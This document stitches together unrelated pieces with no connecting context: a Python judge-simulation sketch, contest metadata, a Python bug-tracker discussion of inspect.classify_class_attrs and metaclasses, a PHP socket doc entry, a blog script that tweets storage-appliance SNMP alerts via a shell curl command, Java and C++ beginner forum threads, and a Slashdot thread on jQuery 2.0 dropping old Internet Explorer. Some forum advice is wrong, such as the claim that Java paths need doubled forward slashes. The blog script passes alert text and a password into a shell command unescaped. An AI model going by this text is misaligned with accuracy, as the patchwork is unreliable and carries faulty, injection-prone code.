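A small simulated judge makes it easy to test strategies offline. This Python sketch assumes the Look semantics described above (answer for the current position first, then advance by v); the loop below only demonstrates that each answer prunes the (position, velocity) search space — it is not a full solution:

```python
class Judge:
    def __init__(self, n, p, v):
        self.n, self.p, self.v = n, p, v
        self.looks = 0

    def look(self, a, b):
        answer = a <= self.p <= b            # answer for the current position...
        self.p = (self.p + self.v) % self.n  # ...then the particle advances
        self.looks += 1
        return answer

n, true_p, true_v = 12, 7, 5
judge = Judge(n, true_p, true_v)
candidates = {(p, v) for p in range(n) for v in range(n)}
for t in range(8):
    a, b = 0, n // 2 - 1
    ans = judge.look(a, b)
    # keep only (p, v) pairs consistent with the answer at query time t
    candidates = {(p, v) for (p, v) in candidates
                  if (a <= (p + v * t) % n <= b) == ans}
```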
Point Value: 40 (partial)
Time Limit: 2.00s
Memory Limit: 128M
Added: Jan 17, 2009
Languages Allowed:
Created on 2013-09-05 02:51 by ethan.furman, last changed 2013-09-15 01:53 by python-dev. This issue is now closed.
Part of the solution for Issue18693 is to have `inspect.classify_class_attrs()` properly consider the metaclass (or type) of the class when searching for the origination point of class attributes.
The fix is changing line 325:
- for base in (cls,) + mro:
+ for base in (cls,) + mro + (type(cls),):
or line 361:
- return cls.__mro__
+ return cls.__mro__ + (type(cls), )
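A short illustration of why the mro alone misses metaclass attributes (hypothetical names, just to show the lookup):

```python
class Meta(type):
    def meta_method(cls):
        return "from metaclass"

class C(metaclass=Meta):
    pass

# the attribute is reachable from the class...
assert C.meta_method() == "from metaclass"
# ...but no class in C.__mro__ defines it
assert all("meta_method" not in vars(base) for base in C.__mro__)
# extending the search to type(cls) finds the defining class
assert "meta_method" in vars(type(C))
```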
Should we target previous Pythons with this fix?
The global fix causes these two tests to fail:
======================================================================
FAIL: test_newstyle_mro (test.test_inspect.TestClassesAndFunctions)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/ethan/source/python/issue18693/Lib/test/test_inspect.py", line 485, in test_newstyle_mro
self.assertEqual(expected, got)
AssertionError: Tuples differ: (<class 'test.test_inspect.Tes... != (<class 'test.test_inspect.Tes...
Second tuple contains 1 additional elements.
First extra element 5:
<class 'type'>
(<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.D'>,
<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.B'>,
<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.C'>,
<class 'test.test_inspect.TestClassesAndFunctions.test_newstyle_mro.<locals>.A'>,
- <class 'object'>)
? ^
+ <class 'object'>,
? ^
+ <class 'type'>)
======================================================================
FAIL: test_help_output_redirect (test.test_pydoc.PydocDocTest)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/home/ethan/source/python/issue18693/Lib/test/test_pydoc.py", line 396, in test_help_output_redirect
self.assertEqual(expected_text, result)
AssertionError: "Help on module test.pydoc_mod in test:\n\nNAME\n test.pydoc_mod - This is a [truncated]... != "Help on module test.pydoc_mod in test:\n\nNAME\n test.pydoc_mod - This is a [truncated]...
Help on module test.pydoc_mod in test:
NAME
test.pydoc_mod - This is a test module for test_pydoc
CLASSES
builtins.object
A
B
class A(builtins.object)
| Hello and goodbye
+ |
+ | Method resolution order:
+ | A
+ | builtins.object
+ | builtins.type
|
| Methods defined here:
|
| __init__()
| Wow, I have no function!
|
| ----------------------------------------------------------------------
| Data descriptors defined here:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class B(builtins.object)
+ | Method resolution order:
+ | B
+ | builtins.object
+ | builtins.type
+ |
| Data descriptors defined here:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| NO_MEANING = 'eggs'
======================================================================
I suspect (hope) updating the tests would be fine.
Another option with the global fix is to only add the metaclass to the mro if the metaclass is not 'type'.
Of course it is causing tests to fail. You are changing behaviour of an existing API. Please find another solution.
Okay, taking a step back.
It seems that currently inspect is geared towards instances and classes, not metaclasses. Consequently, so is help.
So, how do we enhance inspect so that help can be metaclass aware?
classify_class_attrs seems like an obvious choice, and its docstring currently says this:
def classify_class_attrs(cls):
"""Return list of attribute-descriptor tuples.
For each name in dir(cls), the return list contains a 4-tuple
with these elements:
0. The name (a string).
1. The kind of attribute this is, one of these strings:
'class method' created via classmethod()
'static method' created via staticmethod()
'property' created via property()
'method' any other flavor of method
'data' not a method
2. The class which defined this attribute (a class).
3. The object as obtained directly from the defining class's
__dict__, not via getattr. This is especially important for
data attributes: C.data is just a data object, but
C.__dict__['data'] may be a data descriptor with additional
info, like a __doc__ string.
"""
We could add additional 'kind' values of 'hidden class method' and 'hidden class attribute', and then have classify_class_attrs explicitly search metaclasses.
Or, since we have to make a new getmembers (getmetaclassmembers?), we could also make a new classify_metaclass_attrs that handled both class and metaclass.
> It seems that currently inspect is geared towards instances and
> classes, not metaclasses. Consequently, so is help.
I'm afraid I don't really understand what you're talking about. A
metaclass is just a slightly different kind of class :-)
> def classify_class_attrs(cls):
> """Return list of attribute-descriptor tuples.
>
> For each name in dir(cls), the return list contains a 4-tuple
> with these elements:
[...]
> We could add additional 'kind' of 'hidden class method', and 'hidden
> class attributes' and then have classify_class_attrs explicitly search
> metaclasses.
The docstring is clear: "For each name in dir(cls)". If you want stuff
that's hidden in the cls.__class__ (and, consequently, not in dir(cls)),
then you are not looking for the right function, I think.
I can understand wanting to better automate lookup of methods on
classes, rather than on instances, but it would probably deserve another
function.
But I have another question first: doesn't calling
classify_class_attrs() on the metaclass already do what you want?
Antoine, to answer all your questions at once, and using an Enum as the example:
--> dir(Color)
['__class__', '__doc__', '__members__', '__module__', 'blue', 'green', 'red']
--> Color.__members__
mappingproxy(OrderedDict([('red', <Color.red: 1>), ('green', <Color.green: 2>), ('blue', <Color.blue: 3>)]))
-->help(Color)
========================================
Help on class Color in module __main__:
Color = <enum 'Color'>
========================================
Why? Because __members__ is not in Color.__dict__
--> Color.__dict__.keys()
dict_keys(['_member_type_', '_member_names_', '__new__', '_value2member_map_', '__module__', '_member_map_', '__doc__'])
and inspect.classify_class_attrs doesn't look in metaclasses, instead assigning None as the class if it can't find it:
--> inspect.classify_class_attrs(Color) # output trimmed for brevity
Attribute(name='__members__', kind='data', defining_class=None, object= ... )
So, even though __members__ does show up in dir(Color), classify_class_attrs incorrectly assigns its class.
Can I use classify_class_attrs on Color.__class__? Sure, but then I get 50 items, only one of which was listed in dir(Color).
Interestingly, getmembers(Color) does return __members__, even though it is a metaclass attribute and the docs warn that it won't:
--> print('\n'.join([str(i) for i in inspect.getmembers(Color)]))
('__class__', <attribute '__class__' of 'object' objects>)
('__doc__', None)
('__members__', mappingproxy(OrderedDict([('red', <Color.red: 1>), ('green', <Color.green: 2>), ('blue', <Color.blue: 3>)])))
('__module__', '__main__')
('blue', <Color.blue: 3>)
('green', <Color.green: 2>)
('red', <Color.red: 1>)
So if getmembers() correctly reports it because it shows up in dir(), then classify_class_attrs should correctly identify it as well.
This is a more useful help() -- patch attached.
==============================================================================
Help on class Color in module __main__:
class Color(enum.Enum)
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|
| Data and other attributes defined here:
|
| blue = <Color.blue: 3>
|
| green = <Color.green: 2>
|
| red = <Color.red: 1>
|
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|
| __members__
| Returns a mapping of member name->value.
|
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping.
> So, even though __members__ does show up in dir(Color),
> classify_class_attrs incorrectly assigns its class.
>
[...]
>
> So if getmembers() correctly reports it because it shows up in dir(),
> then classify_class_attrs should correctly identify it as well.
Ok, you got me convinced :-)
Cool. Latest patch has a slight doc fix for getmembers.
Will commit on Friday if no other pertinent feedback.
New changeset b0517bb271ad by Ethan Furman in branch 'default':
Close #18929: inspect.classify_class_attrs will now search the metaclasses (last) to find where an attr was defined.
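With that changeset applied (Python 3.4 and later), the behavior under discussion can be verified directly. This is an illustrative check, not part of the patch itself; the exact metaclass name printed differs by version (EnumMeta in older releases, EnumType in newer ones):

```python
import inspect
from enum import Enum

class Color(Enum):
    red = 1
    green = 2
    blue = 3

# __members__ lives on the Enum metaclass, not in Color.__dict__,
# yet it shows up in dir(Color) because the metaclass overrides __dir__.
assert '__members__' not in Color.__dict__
assert '__members__' in dir(Color)

# Post-fix, classify_class_attrs searches the metaclass MRO (last),
# so defining_class is the metaclass rather than None.
attrs = {a.name: a for a in inspect.classify_class_attrs(Color)}
print(attrs['__members__'].defining_class)  # the metaclass, i.e. type(Color)
assert attrs['__members__'].defining_class is type(Color)
```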
php_stream_sock_open_unix() attempts to open the Unix domain socket specified by path. pathlen specifies the length of path. If timeout is not NULL, it specifies a timeout period for the connection attempt. persistent indicates if the stream should be opened as a persistent stream; in most cases this parameter will be 0.
Note: This function will not work under Windows, which does not implement Unix domain sockets. A possible exception to this rule is if your PHP binary was built using Cygwin. You are encouraged to consider this aspect of the portability of your extension before its release.
Note: This function treats path in a binary-safe manner, suitable for use on systems with an abstract namespace (such as Linux), where the first character of path is a NUL character.
Tweeting your Sun Storage 7000 Appliance Alerts
By pmonday on Dec 17, 2009
Twitter, Instant Messages, Mobile Alerts have always fascinated me. I truly believe that a Storage Administrator should not have to leave the comfort of their iPhone, Droid or Palm Pre to do 90% of their day to day management tasks. As I was scanning the headlines of blogs.sun.com I saw this great article on Tweeting from Command Line using Python.
So, leading into how to manage a Sun Storage 7000 Appliance using Alerts (the next article in my series) I thought I would take some time and adapt this script to tweet my received Sun Storage 7000 Appliance Traps. I am going to use the AK MIB traps (to be explained in more detail in the next article) to achieve this.
Writing the Python Trap Handler
First, create the trap handler (this is based on the Python Script presented in the Blog Article: Tweeting from Command Line using Python).
Here is the Python Script:
#!/usr/bin/python
import sys
from os import popen

def tweet(user, password, message):
    print 'Hold on there %s....Your message %s is getting posted....' % (user, message)
    url = ''
    curl = '/usr/dist/local/sei/tools/SunOS-sparc/curl -s -u %s:%s -d status="%s" %s' % (user, password, message, url)
    pipe = popen(curl, 'r')
    print 'Done...awesome'

if __name__ == '__main__':
    # strip the trailing newlines that readline() keeps
    host = sys.stdin.readline().strip()
    ip = sys.stdin.readline().strip()
    uptime = sys.stdin.readline().strip()
    uuid = sys.stdin.readline().strip()
    alertclass = sys.stdin.readline().strip()
    alertcount = sys.stdin.readline().strip()
    alerttype = sys.stdin.readline().strip()
    alertseverity = sys.stdin.readline().strip()
    alertsresponse = sys.stdin.readline().strip()
    messageArray = [host, ip, alerttype]
    t = ","
    message = t.join(messageArray)
    message = message[0:140]
    user = "yourtwitter"  # put your username inside these quotes
    password = "yourpassword"  # put your password inside these quotes
    tweet(user, password, message)
You will have to make the following changes at a minimum
- Verify that the indentation survives copy and paste (Python is whitespace-sensitive)
- Ensure the path to CURL is appropriate
- Change the user and password variables to your Twitter account
Once that is done you should be set.
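If you would rather not depend on an external curl binary at all, the same basic-auth POST can be assembled with the standard library. This is only a sketch of the HTTP mechanics (shown with Python 3's urllib): the URL below is a placeholder, and the basic-auth statuses/update API it mimics has long since been retired by Twitter:

```python
import base64
import urllib.parse
import urllib.request

def build_tweet_request(user, password, message,
                        url="http://example.invalid/statuses/update.xml"):
    """Build the POST that the curl command line performs: HTTP basic
    auth plus a form-encoded 'status' field, truncated to 140 chars."""
    data = urllib.parse.urlencode({"status": message[:140]}).encode("ascii")
    req = urllib.request.Request(url, data=data)  # providing data makes it a POST
    token = base64.b64encode(("%s:%s" % (user, password)).encode("utf-8"))
    req.add_header("Authorization", "Basic " + token.decode("ascii"))
    return req

req = build_tweet_request("yourtwitter", "yourpassword", "host1,10.0.0.1,alert_type")
print(req.get_method())  # POST
# urllib.request.urlopen(req) would actually send it
```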
Adding the Trap Handler to SNMP
Next, set up your snmptrapd.conf to handle traps from the AK MIB by invoking the Python Script above. My /etc/sma/snmp/snmptrapd.conf looks something like this:
traphandle .1.3.6.1.4.1.42.2.225.1.3.0.1 /export/home/oracle/ak-tweet.py
The OID .1.3.6.1.4.1.42.2.225.1.3.0.1 identifies the sunAkTraps portion of the AK-MIB delivered with the Sun Storage 7000 Appliance.
Now, invoke snmptrapd using the above configuration file (there are many ways to do this, but this is the way I know will pick up my config file):
/usr/sfw/sbin/snmptrapd -c /etc/sma/snmp/snmptrapd.conf -P
Sending Alerts from the Sun Storage 7000
Using the article I posted yesterday, ensure SNMP is enabled with a trapsink identifying the system where your trap receiver is running. Now we have to enable an alert to be sent via SNMP from your Sun Storage 7000 Appliance (this is different from the default Fault Management Traps I discussed yesterday).
For now, trust me on this (I will explain more in my next article): let's enable a simple ARC size threshold. Go into the Browser User Interface for your system (or the simulator) and go to the Configuration -> Alerts screen. Click through to the "Thresholds" tab and add one that you know will be violated, like this one:
Each alert that is sent gets posted to the twitter account identified within the Python Script! And as my friends quickly noted, from there it can go to your Facebook account where you can quickly declare "King of the Lab"!
Thanks Sandip for your inspiring post this morning
I did ImageIcon like the API suggested, but it's not finding the file, even though it clearly exists; I was able to import it into the Java project itself, yet it can't be found. What's going on?!?
It is very difficult to help you without any code and information. Are you specifying an absolute or relative path? Are you trying to open this from a class that is in a package? The more info the better
Is the image in the same scope as your program? If it is, you can use the name directly; else you have to use the full path (c:\blahh blahh).
I had it imported into the project, yes.
I tried lots of things, including having the word images/ in the quotes.
It's showing in the thing that shows all the components of the package in Eclipse.
It's under a column called "Referenced Libraries".
Also, by any chance is the image being lost? I have a JComboBox that shows certain pictures when certain choices are selected. The JComboBox is outside of the JSplitPane but still in the JFrame; I have a JTextArea on one side, and the other side is supposed to have a label that is set to an icon. When another option is selected, the previous picture is removed from the component (though it should be able to come back if selected again in the JComboBox) and a new one takes its place. This is done to keep too many pictures that I don't want showing from building up. It's kind of like a column in an online newspaper (though I'm not making an applet), where the story and the image change inside the JSplitPane when the user selects a different story in the JComboBox. Except the JLabel set to the image won't show: the method that makes a new ImageIcon from a file and a description, which I pass in the parameters, is returning path not found: "image name".
I got the createImageIcon method from this:
Do I have to have the whole path name from the description in order for it to recognize the image if it isn't in the same scope as the program?
By description, I don't mean the parameter; I mean the thing that tells me where the file is and all that other stuff when I click on the image on my computer and choose "Properties" from the popup menu.
Last edited by javapenguin; July 8th, 2010 at 03:54 PM.
The path to the image depends upon where your image in in your Eclipse project. A matter or preference, but I usually either import it into the project by right clicking the project and going to import and from there choose the image, or for larger projects and to keep things a bit more ordered create a new package called images, right click that and import the image there. From your createImageIcon function, call the 'full' path: either "/myImage.jpg" or "/images/myImage.jpg" - note the beginning slash specifying the root folder of the project (otherwise the JVM will look in the location where the calling class is located).
Tried that. Now what goes before the / ?
Does it matter by chance how many bytes the image has?
Do I put the path name in the quotes or the entire location of where the picture is?
try something. Type in the absolute path when you create the file and see if it can see it then. Remember that if you're using Windows, file directories are moved through by "\\" in Java, not "/".
If it can find the file at that point, it means that something in your declaration of the relative path.
What's an absolute path?
Is it the entire long drawn out path with the folder C and everything
Ok, is the absolute path the file location? I have no clue what an absolute path is.
Ok, here are several examples of things I'm going to try.
Option One: "//images//myIcon.jpg"
Option Two: "//myIcon.jpg""
Option Three: "//projectName//myIcon.jpg"
Option Four: "\\projectName\\src\\subFolder\\Users\\me\\Downloads\\myIcon.jpg"
Option Five: Option four without the beginning \\
Option Six: Option Two without \\ at beginning
Last edited by javapenguin; July 8th, 2010 at 06:01 PM. Reason: Clarifying
The absolute or relative paths can be navigated either using \\ or / in windows. The only reason you need \\ is because \ by itself signals the beginning of an escape character. The actual path you will get will only have one \ because you "escaped" out of the escape character.
An absolute path is the path that completely describes the location of the file starting from which partition it's in (say, C:\ in windows). A relative path is a path that describes the exact same location but relative from some point.
You can test to see if you're even finding the image:
In eclipse, the startup folder is the base project folder. If you put your image right into the base project folder, you can just put the file name and it should find it (fyi, this is a relative path).
If your image is not located in exactly the same folder you're referencing from, you need to use "dots" to navigate upwards, then specifically spell out which folders to navigate back down.
File file1 = new File("../image.png"); // the image is in the folder above this one File file2 = new File("../../Other Folder/image.png"); // the image is two folders up, then inside Other Folder File file3 = new File("./image.png"); // image is in the same folder. Notice only one dot File file4 = new File("image.png"); // same thing as file3
Last edited by helloworld922; July 9th, 2010 at 01:07 AM.
import javax.swing.JFileChooser; import java.io.File; public class FileOpen { public static void main(String args[]) throws Exception { JFileChooser fileChooser = new JFileChooser(); fileChooser.showOpenDialog(null); File file = fileChooser.getSelectedFile(); System.out.println(file.getAbsolutePath()); } }
This will open up a basic file chooser. Go through the file chooser and select the file and press ok. It will then print out the absolute path of the file you selected. I use the absolute path file returns when I need to reference the xls files I read and write to using SmartXLS, so it does work to connect to a file.
Insistently, I guess you dont have to use the \\ to go through directories. However I've used it since I was told I did and it has always worked for me, so I dunno.
To clarify this a bit, absolute and relative paths have a somewhat different meaning when discussing a computer file system versus the package system the original poster is using (eg using Class.getResource()). Using the createImageIcon method (which uses Class.getResource()) a relative path is relative to the class, and the absolute path is relative to the package.
To reiterate my instructions I alluded to above for Eclipse:
- Right click the Project and choose Import.
- Select the file(s) of choice
- This imports the files into the 'root' location of your project.
- To access this image, for example say its name is "myImage.jpg", use the package absolute path: createImageIcon("/myImage.jpg", "Image description");
- If you imported your image into the package the calling class resides in, remove the beginning slash
- You can import an image into any package, but you must tell the JVM where the image is by using unix type paths ('../' to backtrack up a directory, '/' at the beginning to specify the root, './' to specify this directory, etc...)
Last edited by copeg; July 8th, 2010 at 08:57 PM.
In java you can use forward slash, but you have to use 2 of them. EXAMPLE: "SRC//Images//icon.png"
//"); }
By the same token, the same applies to back-slash, just remember that back-slash is the escape character so they MUST come in pairs of 2.
//"); }
Last edited by helloworld922; July 9th, 2010 at 01:06 AM.
C++.......as stated above...thanks for any answer
5 replies to this topic
#1
Posted 28 September 2010 - 11:46 PM
#2
Posted 29 September 2010 - 02:23 AM
#include <iostream>
#include <fstream>
#include <string>
#include <vector>
using namespace std;

int main()
{
    ifstream file( "items.txt" ) ;
    string line ;
    vector<string> lines ;
    while( getline( file, line ) )
        lines.push_back( line ) ;
    cout << "#items: " << lines.size() << '\n' ;
}
#3
Posted 29 September 2010 - 06:11 PM
What if I don't want to use string and vector? Because we have not yet learned vector.
#4
Posted 30 September 2010 - 10:16 AM
Just input each "item" into a variable, increment a counter, and loop through that until EOF is found.
Latinamne loqueris?
#5
Posted 30 September 2010 - 10:12 PM
If we do not know what the items in the external file are, what should we do to calculate the total number of items?
#6
Posted 01 October 2010 - 05:35 AM
Read it as binary data and count new lines? Does this work?
A conclusion is where you got tired of thinking.
#define class struct // All is public.
jQuery 2.0 Will Drop Support For IE 6, 7, 8
Soulskill posted more than 2 years ago | from the go-big-or-go-home dept.
Like (4, Insightful)
Krojack (575051) | more than 2 years ago | (#40642215)
Re:Like (1)
Anonymous Coward | more than 2 years ago | (#40642259)
I agree that a lot of situations will not be able to move to 2.0, but I bet you will see it implemented a lot more than you would expect.
Re:Like (1)
Anonymous Coward | more than 2 years ago | (#40642375)
I agree. You see more and more websites that are dropping compatibility with older versions of IE, and direct users to Firefox or Chrome. It's a good thing too. It's annoying to dumb down on features for website, just because a small portion of them refuse to upgrade to better browsers.
Corporate websites, it's not going to matter. They'll just continue using an old version of jQuery on Firefox 3.6 or something.
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40642273)
The problem is they're dropping support for 8, which is still popular. 7 is still popularish, but wouldn't be that big a deal at under 10%. 6 is practically dead at this point.
IE8 = "latest" version for many (5, Insightful)
tverbeek (457094) | more than 2 years ago | (#40642505)
Re:IE8 = "latest" version for many (5, Interesting)
dingen (958134) | more than 2 years ago | (#40642633)
The problem is that IE8 handles Javascript in much the same non-standard way as IE6 & IE7. If a library such as jQuery includes support for IE8, it's supporting IE6 & IE7 as well.
Re:IE8 = "latest" version for many (4, Informative)
jellomizer (103300) | more than 2 years ago | (#40642899)
However my organization just Upgraded to IE 8.
There isn't any plan to go to 9 in the near future, as there are too many apps that have issues with following open standards.
Re:IE8 = "latest" version for many (2)
dingen (958134) | more than 2 years ago | (#40642929)
That's why the jQuery team is going to provide security fixes for 1.9 for a while.
Re:IE8 = "latest" version for many (1)
denis-The-menace (471988) | more than 2 years ago | (#40643087)
Chrome + IEtab = solved
configure IETab to use IE when chrome hits one of your ass-backwards web apps.
Re:IE8 = "latest" version for many (3, Informative)
steveb3210 (962811) | more than 2 years ago | (#40643093)
Re:IE8 = "latest" version for many (1)
colinrichardday (768814) | more than 2 years ago | (#40643317)
What if a developer needs a (standard) feature that a browser doesn't support?
Re:IE8 = "latest" version for many (0)
Anonymous Coward | more than 2 years ago | (#40643389)
What if a developer needs a (standard) feature that a browser doesn't support?
Well, then you need to make a choice. Is this nifty new feature so useful that you risk alienating some of your website visitors?
Re:IE8 = "latest" version for many (0)
Anonymous Coward | more than 2 years ago | (#40642663)
It's not going to go away just because someone doesn't want to support it any more.
But it might go away once no one wants to support it anymore.
Re:IE8 = "latest" version for many (4, Informative)
cyber-vandal (148830) | more than 2 years ago | (#40642665)
You can use conditional comments to load the older version of JQuery for IE6, 7 and 8 so it's not as bad as it seems. Web designers have been doing this for years to hack around Microsoft's incompetence,
Re:IE8 = "latest" version for many (2)
Billly Gates (198444) | more than 2 years ago | (#40643115) support for its apps. That was 5 years ago and we still have these issues because it is so far behind and it is common that we should be implementing css 3 and html 5 and use JIT javascript engines to not leave these users behind, but the corps will make us use IE 8 until 2020 if they can.
Browsers should be upgraded frequently like Windows Update. If developers stop supporting like they did with 16 bit Win 3.x apps, dos, netscape, the corps move on. If not we still would be using Windows 3.1 with Netscape 4.7 today. Why? It works fine!
IE 8 in the US already drops down to 11% market share on the weekends! It is on its way out and it is time people moved with the times.
Hate (1)
Anonymous Coward | more than 2 years ago | (#40642329)
This is horrible - not because I like these browsers, but because so many people use jQuery for just that - making web sites work in as many browsers as possible.
Re:Like (5, Informative)
Kate6 (895650) | more than 2 years ago | (#40642333)
Re:Like (1)
Anonymous Coward | more than 2 years ago | (#40642473)
Re:Like (2)
man_of_mr_e (217855) | more than 2 years ago | (#40642537)
Or use Modernizr's browser identification.
Re:Like (2)
man_of_mr_e (217855) | more than 2 years ago | (#40642559)
This is fine for 1.9/2.0 but what happens when 2.1 and 2.2 come out? The API's will diverge.
I hope 1.9 stays api compatible, but I would doubt it.
Re:Like (3, Interesting)
Kate6 (895650) | more than 2 years ago | (#40642615)
So we might end up with some jQuery functionality silently being disabled in legacy versions of IE too. Big whoop.
Re:Like (1)
dingen (958134) | more than 2 years ago | (#40642649)
Once a version of jQuery 2.x comes out with an API which isn't compatible with 1.9, IE8 better be long forgotten.
Re:Like (1)
man_of_mr_e (217855) | more than 2 years ago | (#40642817)
jQuery comes out with new APIs all the time. Remember, live was deprecated by delegate, then by on... this stuff seems to happen *EVERY* single version.
Re:Like (4, Informative)
dingen (958134) | more than 2 years ago | (#40642883)
But .delegate(), .on() and .live() all still work with recent versions of jQuery, so your old code still runs with newer versions of the library. New features being introduced is not bad. The pain starts when old features are dropped.
Re:Like (1)
shutdown -p now (807394) | more than 2 years ago | (#40643371)
XP (and therefore IE6/7/8) is not going to be with us forever, either.
Re:Like (1)
Krojack (575051) | more than 2 years ago | (#40642721) (1)
Kate6 (895650) | more than 2 years ago | (#40642781)
Don't get me wrong, full API compatibility is one heck of a claim to make, and I guess we'll have to see just how close they actually get. But assuming they largely make good on their claim, this just isn't really major news. They're creating a more optimized version of their library for more modern browsers.
Big whoop.
Re:Like (4, Insightful)
madprof (4723) | more than 2 years ago | (#40642947)
Holy moley. I might be saying what others say but please, for the love of everything good, use conditional comments.
They've been around since IE5. You will love them.
Re:Like (1, Flamebait)
Kate6 (895650) | more than 2 years ago | (#40642987)
Re:Like (1)
cheesecake23 (1110663) | more than 2 years ago | (#40642503)
Re:Like (1)
Billly Gates (198444) | more than 2 years ago | (#40642711).
You Cheesecake23 have been misled by a vocal minority! [saveie6.com]
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40643071)
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40643279)
Is that site a joke, or was it written by a moron? I couldn't quite tell.
It is loaded with all sorts of seriousness and professionalism [saveie6.com] . The comments too from the front page just give it away.
“Now that I've switched to IE6, I'll never go back to Lynx again!”
Sue Donym
“Trying to get your website to work correctly in IE6 is like a puzzle game! Challenging and fun!”
Nathan
“Developing websites for other browsers than IE6 is just pure pain! The tables just don’t display the way they do in IE6.”
Dean T. P
Re:Like (0)
Anonymous Coward | more than 2 years ago | (#40642961)
The need to specifically code for IE6 and IE7 due to their crappy compliance with web standards has swallowed immense amounts of global developer effort, which could otherwise have been invested in improving the interwebs for everyone.
There is no *need* to code for old IEs.
There is just the web developers' *urge* to produce flashy crappy blinking rolling sliding shaking tilting sites which make the user puke in less than five minutes.
Despite being the cradle of the marquee tag, I find the old IEs right now to be a good anchor weight which forces web developers to make sites which are more "useful" than "look cool in my portfolio." Unfortunately, even the old IEs allow for too much crap...
Re:Like (1)
nedlohs (1335013) | more than 2 years ago | (#40643051)
Given most (not all) web development makes things worse, that seems like a good thing.
Re:Like (1)
TheSpoom (715771) | more than 2 years ago | (#40642585)
Re:Like (2)
cyber-vandal (148830) | more than 2 years ago | (#40642731)
This [microsoft.com] is a far better way since anything non-IE pretending to be IE will just ignore these. Web designers have been using these for years to load special CSS workarounds for all the bugs in IE.
Re:Like (1)
TheSpoom (715771) | more than 2 years ago | (#40643219) comments. Besides, using server-side handling keeps the HTML output cleaner since all the user gets is the single, correct script tag.
Conditionally include 1.9/2.0 (1)
kawika (87069) | more than 2 years ago | (#40643105).
They seem to be missing the point... (2)
Anonymous Coward | more than 2 years ago | (#40642249)?
Re:They seem to be missing the point... (0)
Anonymous Coward | more than 2 years ago | (#40642297)
Use 1.9 until 2014-04-08 (2)
tepples (727027) | more than 2 years ago | (#40642463)
Re:Use 1.9 until 2014-04-08 (1)
pak9rabid (1011935) | more than 2 years ago | (#40642529)
Re:Use 1.9 until 2014-04-08 (1)
JDG1980 (2438906) | more than 2 years ago | (#40642967) up for a variety of reasons (logistics, legacy compatibility, IE6 ActiveX crap, etc.) As a result, I think there will be heavy pressure on Microsoft to lease the source code for WinXP to trusted third parties for continued maintenance and service. Expect a carrot-and-stick approach from the affected organizations: lots of money offered in contracts if WinXP continues to be somehow supportable, combined with threats that if they have to redo everything to leave XP, they might as well switch to MacOS or Linux instead of upgrading to the newest version of Windows. And, of course, governments have even more tools than this at their disposal if they don't like what MS is doing.
There's a very real possibility that we will see a de facto fork of Windows within the next five years.
Viewing any web site with IE 8 is unsafe (1)
tepples (727027) | more than 2 years ago | (#40643069)
Re:Viewing any web site with IE 8 is unsafe (0)
Anonymous Coward | more than 2 years ago | (#40643191)
Sites can "recommend" it all they want. If governments and other organizations aren't willing to move beyond XP it doesn't matter.
Re:Viewing any web site with IE 8 is unsafe (1)
shutdown -p now (807394) | more than 2 years ago | (#40643381)
Most sites don't care about governments and large organizations, and target individual customers directly.
Re:Use 1.9 until 2014-04-08 (1)
dingen (958134) | more than 2 years ago | (#40642695) (1)
tepples (727027) | more than 2 years ago | (#40643089)
Re:It's a prisoner's dilemma (1)
Billly Gates (198444) | more than 2 years ago | (#40643353)
Google was instrumental in stopping IE 6 and 7 in late 2009. Hell, 1/5 of the web's traffic was IE 6 in the US (not China) until Youtube, Gmail, and others put up notices that we won't support your browser anymore.
It worked very well. That and advertisements for Chrome helped too for clueless users who did not know where to get a better browser as statistics show the majority of new Chrome users are former IE users and not FF.
Business will upgrade when people stop supporting it. They left DOS behind, Win 16 apps behind, and Netscape intranet software behind too. If enough people stop supporting it they will leave. It is the opposite of software being sold RIGHT NOW in 2012 that still requires XP and even IE 8 keeps these guys locked in. Not everyone is big like google and yes, they lost some Google Doc accounts to Office 365 for their refusal of IE 7 support, but it works.
People are ignorant and if something works fine and developers take external costs and time to themselves for free they will never leave. Have the cool CSS 3 sites only work in IE 9 or later and people will eventually upgrade.
IE Version Code Breakdown? (2)
lavaforge (245529) | more than 2 years ago | (#40642289)? (5, Informative)
tobiasly (524456) | more than 2 years ago | (#40642501)? (4, Informative)
kawika (87069) | more than 2 years ago | (#40642757).
So it's like Python 3 (3, Insightful)
tepples (727027) | more than 2 years ago | (#40642291)
Re:So it's like Python 3 (2)
dririan (1131339) | more than 2 years ago | (#40642673)'t ship their own Python runtime in the first place) a simple EXE wrapper can use the right interpreter.
What part of this isn't easy?
Also, many developers make things compatible with both, which is made much easier with 2to3 [python.org] . Quite a few setup.py scripts use 2to3 automatically even, to be compatible with both using the normal python setup.py install.
EXE wrappers and third-party libraries (1)
tepples (727027) | more than 2 years ago | (#40643183):So it's like Python 3 (1)
the_demiurge (26115) | more than 2 years ago | (#40642761).
Too soon (2)
knetcomp (1611179) | more than 2 years ago | (#40642313)
Re:Too soon (1)
Billly Gates (198444) | more than 2 years ago | (#40642833)
I hate old IE versions as much as every other web developer, but I don't think this is the right way to go yet. One of the main reasons most developers love jQuery is because it allows them to forget about IE quirks and lack of compliance, and just write code. I think it would be better if they continued to support IE in their main branch, but also offer a "lite" version without IE support.
Knet, why don't you see 16 bit Windows 3.x apps anymore? Why did windows95 not fail? Why did XP not fail?
The answer is developers said enough is enough and stopped porting to ancient standards. XP should have died years ago and IE 6 will keep staying as long as people think their platforms are fine. Look it runs everything!
Corporations and cheapskates are setting the standard locked forever and IE 8 is 3 years old. But it is what IE 6 should have been and was still far behind. It is time to move on and I am not saying this for the sake of change for something that works.
